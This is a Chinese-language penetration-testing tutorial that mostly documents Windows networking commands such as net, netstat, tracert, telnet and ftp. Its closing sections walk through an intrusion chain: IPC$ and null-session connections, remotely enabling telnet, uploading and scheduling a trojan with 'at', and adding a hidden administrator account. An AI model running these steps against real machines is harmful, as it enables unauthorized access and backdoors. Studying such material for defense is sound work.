渗透测试？--常用cmd命令

使用ping命令测试网络连接

1. 获取NETBIOS主机名

format: “ping -a IP地址”  
for example: “ping -a 172.16.10.20” 

使用net命令管理网络环境

1. net account

   该命令用于更新用户的账户数据库，并且为所有账户修改密码和登录需求，如：强制用户在时间到期之后多久必须注销、密码最长/短使用期限、密码长度下限、锁定阈值、锁定持续时间、锁定观测窗口和计算机角色等详细信息

format:
“net accounts [/forcelogoff:{minutes|no}][/minpwlen:length][/maxpwage:{days|unlimited}][/minpwage:days][/uniquepw:number][/sync][/domain]”
​
for example:
“net accounts” 

参数	说明
不带参数	显示密码、登录限制和域信息的当前配置
/forcelogoff:{minutes|no}	设置当前用户账户或有效登录时间到期时在结束用户与服务器会话前等待的分钟数
/minpwlen:length	设置用户账户密码的最少字符数
/maxpwage:{days|unlimited}	设置用户账户密码有效天数的最大值
/maxpwage:unlimited	设置账户密码永远有效
/minpwage:days	设置用户可以更改新密码前的最小天数
/uniquepw:number	设置用户不对number次密码更改重复相同的密码
/sync	更新所有成员服务服务器的用户账户数据库
/domain	对当前域的主域控制器执行操作

2. net computer

   该命令用于添加或者删除域数据库中的计算机，所有计算机的添加和删除都会转发到主域控制器

format：“net computer \\computername {/add|/del}”

3. net config

该命令用于显示工作站或服务器服务的配置消息，或者显示并更改某项服务的设置

format：“net config [service[options]]”

参数	说明
service	通过net config命令进行配置的服务
options	服务的特定选项

• net config workstation命令用于显示更改配置工作站服务参数，更改立即生效并永久保持

format：“net config workstation [/charcount:bytes][/chartime:msec][/charwait:sec]”

参数	说明
/charcount:bytes	指定在数据发送到通信设备之前Windows收集的数据量，默认16字节
/chartime:msec	设置Windows在将数据发送到通信设备前手机数据的毫秒数，默认250毫秒
/charwait:sec	将Windows等待通信设备的秒数设置为可用，默认3600秒

4. net continue

   该命令能用重新激活挂起的服务

format：“net continue service”

5. net file

   用于显示某种服务器上所有打开的共享文件夹及锁定文件夹数，也可以关闭个别文件并取消文件锁定

   参数	说明
   id	文件标识号
   /close	关闭打开的文件并释放锁定记录。请从共享文件的服务器中键入该命令

6. net group

   用于Windows NT Server域中添加、更改或显示全局组，仅在Windows NT Server域中可用

   
   format：“net group [groupname [/comment:"text"]][/domain]
           net group groupname {/add[/comment:"text"]|delete}[/domain]
           net group groupname username[...]{/add|/delete}[/domain]”

   参数	说明
   groupname	要添加、扩展或删除的组。仅提供某个组名便可查看组中的用户列表
   /comment:"text"	为新建组或现有组添加注释。最多48个字符并用引号将注释文字引注
   /domain	在当前域的主域控制器中执行该操作，否则在本地计算机上执行操作
   username[...]	列表显示要添加到组或从组中删除的一个或多个用户
   /add	添加组或在组中添加用户名。必须使用该命令为添加到组中的用户建立账号
   /delete	删除组或从组中删除用户名

7. net help

   该命令用于提供网络命令列表及帮助主题，可以说不会用net命令，就用这个命令就可以了

   
   format：“net help [command] net command {/help|/?}”

8. net localgroup

   用于显示、删除或更改本地组

   
   format：“net localgroup [groupname [/comment:"text"]][/domain]
           net localgroup groupname{/add [/comment:"text"]|/delete}[/domain]
           net localgroup groupname name[...]{/add|/delete}[/domain]”

9. net name

   用于添加或删除消息名（有时称别名），或显示计算机接受消息的列表。要使用该命令则必须先运行信使服务

   
   format：”net name[name [/add|/delete]]“

10. net print

    用于显示或控制打印作业及打印队列

    
    format：”net print \computername
            net print \sharename
            net print [\computername] job# [/hold|/release|/delete]“

11. net session

    用于列出或断开本地计算机和与之连接的客户端会话

    
    format：”net session [\computername][/delete]“

12. net send

    用于向网络的其他用户、计算机发送消息。要接受消息必须运行信使服务

    
    format：”net send {name|*|/domain[:name]|/users} message“

    参数	说明
    name	要接受发送消息得用户名、计算机名或通信名
    *	将消息发送到组中所有名称
    /domain[:name]	将消息发送到计算机域中的所有名称
    /users	将消息发送到与服务器连接的所有用户
    message	作为消息发送的文本

13. net share

    用于创建、删除或显示共享资源

    
    format：”net share sharename
            net share sharename=drive:path [/users:number|/unlimited][/remark:"text"]
            net share sharename [/users:number|unlimited][/remark:"text"]
            net share {sharename|drive:path} /delete“

    参数	说明
    sharename	共享资源的网络名称
    drive:path	指定共享文件的绝对路径
    /users:number	设置可同时访问共享资源的最大用户数
    /unlimited	不限制同时访问用户数
    /remark:"text"	添加关于共享的注释
    /delete	停止共享资源

14. net time

    用于时计算机的时间与另一台计算机或域的时间同步。不带/set参数时，将显示另外一台计算机或域的时间

    
    format：”net time [\\computername|/domain[:name]][/set]“

    参数
    \computername	要检查或同步的服务器名
    /domain[:name]	指定要与其同步时间的域
    /set	使本计算机时钟与指定计算机或域的时间同步

使用telnet命令进行远程登陆

1. 格式

   
   format：”telnet ip地址/主机名称“

2. 步骤

   • 输入”telnet 主机名/ip地址“启动telnet会话

   • 一旦telnet成功连接到远程计算机上，就显示登陆信息并提示用户输入用户名和口令

   • 如果输入正确就能成功的登录并在远程计算机上工作

   • ​

使用ftp命令进行数据传输

1. 格式

   
   format：”ftp -v -d -l -n -g [主机名]“

   参数	说明
   -v	显示远程服务器的所有响应信息
   -d	使用调试方式，显示在客户端和服务器之间传递的ftp命令
   -l	传送多个文件时关闭交换提示
   -n	限制ftp的自动登录
   -g	取消全局文件名

   ​

使用netstat命令查看网络连接的相关信息

1. 使用netstat -a命令：显示所有连接和端口

2. 使用netstat -b命令：显示包含创建每个连接或者监听端口的可执行文件

3. 使用netstat -e命令：显示以太网数据统计，可以结合-s使用

4. 使用netstat -n命令：能以网络IP地址代替名称，显示网络连接情形

5. netstat /help查看命令帮助。。。

   ​

使用tracert命令查看IP数据报的传输路径

• tracert是路由跟踪实用程序，该命令用于确定IP数据包访问目标所采取的路径

  
  format：“tracert [-d][-h maximum_hops][-j host-list][-w timeout] targer_name”
  for example:“tracert 主机名”

  参数	说明
  -d	指定不将IP地址解析到主机名
  -h maximum_hops	指定跃点数以跟踪到成为target_name的主机的路由
  -j host-list	指定tracert实用程序数据包所采用路径中的路由接口列表
  -w timeout	等待timeout为每次回复所指定的毫秒数
  target_name	目标主机名称或IP地址

  ​

IPC$入侵与防范

1. 建立IPC$连接

   
   format：“net use \\IP\ipc$ Password/user:Admin”
   ​
   IP:目标ip地址
   Password：目标计算机密码
   Admin：目标计算机用户名

2. 建立映射

   
   format：“net use z:\\IP\c$”
   ​
   \\IP\c$ 表示目标电脑上的C盘，符号$表示隐藏的共享，z:表示将远程主机的C盘映射为本地磁盘的盘符

3. 查看远程连接

   
   format：“net use * /del”

4. 空连接漏洞

   
   format：“net use \\ip "" /user:"" ” --注意一共有四个空格 引号不能少

   IPC$连接原本是要求客户机具有足够的权限才能连接到主机，然而该漏洞允许客户端使用空用户名和密码就可以与目标主机成功建立连接。虽然这样无法执行管理类操作，既不能映射网络驱动器、上传文件、执行脚本命令，但是却可以用来探测目标主机中的一些信息。

   ​

Telnet入侵

• 使用telnet入侵前必须建立IPC$连接，建立连接是为了方便开启远程计算机中被禁用的telnet服务

  
  format：“sc \\ip config tlntsvr start=auto” --用sc命令把禁用的telnet服务变成自动
          “sc \\ip start tlntsvr” --用sc命令启动telnet服务
          “telnet ip” --登录telnet
          “net share” --查看默认共享
          “net share sharename=drive:path” --建立c$共享
          “copy \1.txt \\ip\c$” --copy命令上传木马 这里是把命令行切到c盘下了，1.txt在C盘根目录
          “at \\ip time cmd” --at命令定时执行 time参数为时间 cmd为上传到目标主机共享的程序名 即木马
          “net user 用户名 密码 /add” --添加用户
          “net localgroup administrators 用户名 /add” --为上一步添加的用户名加入工作组 

  • 注意：如果对方采用了NTLM认证策略，可以连接网络注册表修改HKEYLOCAL\MACHINE\SOFTWARE\MICROSOFT\TELNETSERVERf\1.0 下的NTLM键值由2改成0，然后重启telnet服务

  • ​

  ​

通过注册表入侵

• Windows注册表是帮助Widnows控制硬件、软加你、用户环境和Windows界面的一套数据文件，入侵者可在注册表编辑器中通过连接网络注册表进入远程计算机的注册表并进行实时监控。如果想阻止该入侵，只需要关闭Remote Registry服务

• ​